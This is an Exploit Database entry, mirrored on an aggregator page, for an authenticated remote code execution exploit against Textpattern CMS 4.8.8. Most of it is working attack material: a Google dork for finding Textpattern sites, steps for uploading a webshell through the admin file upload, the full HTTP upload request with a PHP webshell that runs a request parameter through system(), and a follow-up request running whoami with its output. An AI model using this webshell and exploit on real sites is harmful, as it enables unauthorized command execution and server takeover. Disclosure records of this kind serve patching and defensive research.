Textpattern 4.8.8 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 39 阅读

• 作者： Alperen Ergel
  日期： 2023-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51176/

• # Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
  # Exploit Author: Alperen Ergel
  # Contact: @alpernae (IG/TW)
  # Software Homepage: https://textpattern.com/
  # Version : 4.8.8
  # Tested on: windows 11 xammp | Kali linux
  # Category: WebApp
  # Google Dork: intext:"Published with Textpattern CMS"
  # Date: 10/09/2022
  #
  ######## Description ########
  #
  #Step 1: Login admin account and go settings of site
  #Step 2: Upload a file to web site and selecet the rce.php
  #Step3 : Upload your webshell that's it...
  #
  ######## Proof of Concept ########
  
  
  ========>>> START REQUEST <<<=========
  
  
  
  
  ############# POST REQUEST (FILE UPLOAD) ############################## (1)
  
  POST /textpattern/index.php?event=file HTTP/1.1
  Host: localhost
  Content-Length: 1038
  sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
  Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
  X-Requested-With: XMLHttpRequest
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Origin: http://localhost
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: http://localhost/textpattern/index.php?event=file
  Accept-Encoding: gzip, deflate
  Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
  Connection: close
  
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu
  Content-Disposition: form-data; name="fileInputOrder"
  
  1/1
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu
  Content-Disposition: form-data; name="app_mode"
  
  async
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu
  Content-Disposition: form-data; name="MAX_FILE_SIZE"
  
  2000000
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu
  Content-Disposition: form-data; name="event"
  
  file
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu
  Content-Disposition: form-data; name="step"
  
  file_insert
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu
  Content-Disposition: form-data; name="id"
  
  
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu
  Content-Disposition: form-data; name="_txp_token"
  
  16ea3b64ca6379aee9599586dae73a5d
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu
  Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
  Content-Type: application/octet-stream
  
  <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
  ------WebKitFormBoundaryMgUEFltFdqBVvdJu--
  
  
  ############ POST RESPONSE (FILE UPLOAD) ######### (1)
  
  HTTP/1.1 200 OK
  Date: Sat, 10 Sep 2022 15:28:57 GMT
  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
  X-Powered-By: PHP/8.1.6
  X-Textpattern-Runtime: 35.38 ms
  X-Textpattern-Querytime: 9.55 ms
  X-Textpattern-Queries: 16
  X-Textpattern-Memory: 2893 kB
  Content-Length: 270
  Connection: close
  Content-Type: text/javascript; charset=utf-8
  
  ___________________________________________________________________________________________________________________________________________________
  
  ############ REQUEST TO THE PAYLOAD ############################### (2)
  
  GET /files/c.php?cmd=whoami HTTP/1.1
  Host: localhost
  sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate
  Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  Cookie: txp_login_public=4353608be0admin
  Connection: close
  
  
  ############ RESPONSE THE PAYLOAD ############################### (2)
  
  HTTP/1.1 200 OK
  Date: Sat, 10 Sep 2022 15:33:06 GMT
  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
  X-Powered-By: PHP/8.1.6
  Content-Length: 29
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  <pre>alpernae\alperen
  </pre>
  
  ========>>> END REQUEST <<<=========